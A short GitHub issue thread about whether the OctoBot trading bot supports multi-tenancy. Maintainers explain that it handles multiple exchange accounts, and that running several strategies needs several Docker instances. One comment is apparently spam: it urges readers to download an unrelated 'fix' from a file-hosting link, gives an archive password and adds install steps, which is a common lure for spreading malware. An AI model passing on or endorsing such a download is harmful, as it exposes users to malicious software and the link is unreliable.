### ISSUE TITLE
Does octobot support multi-tenancy ?

### ISSUE THREAD

**Issue by shubhamraut41** [Drakkar-Software/OctoBot#2724]

**Comment by GuillaumeDSM** [comment]
If by "multi-tenancy" you mean using multiple exchange accounts, then yes.
if you mean 1 OctoBot  = a SAS system to run X strategies for Y users, then no

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sevenjay** [comment]
but how to?
i run by  docker, command `docker run -itd --name OctoBot -p 80:5001 -v $(pwd)/user:/octobot/user -v $(pwd)/tentacles:/octobot/tentacles -v $(pwd)/logs:/octobot/logs drakkarsoftware/octobot:stable`
I could setup just only one strategy.
or just run more than one docker instance?

**Comment by Herklos** [comment]
> but how to? i run by docker, command `docker run -itd --name OctoBot -p 80:5001 -v $(pwd)/user:/octobot/user -v $(pwd)/tentacles:/octobot/tentacles -v $(pwd)/logs:/octobot/logs drakkarsoftware/octobot:stable` I could setup just only one strategy. or just run more than one docker instance?

Yes you need multiple docker instance to run multiple strategies as explained at https://www.octobot.cloud/en/guides/octobot-usage/having-multiple-octobots-on-one-computer
